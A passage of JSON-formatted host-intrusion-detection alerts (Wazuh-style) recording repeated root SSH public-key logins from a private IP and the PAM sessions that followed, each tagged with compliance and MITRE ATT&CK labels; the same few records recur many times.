SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} +{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by 
(uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} +{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication 
success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} +{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 
16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote 
Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} +{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} +{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial 
Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 
16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} +{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA 
SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} +{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by 
(uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} +{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication 
success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} +{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 
16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote 
Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} +{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} +{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial 
Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 
16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} +{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA 
SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} +{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial 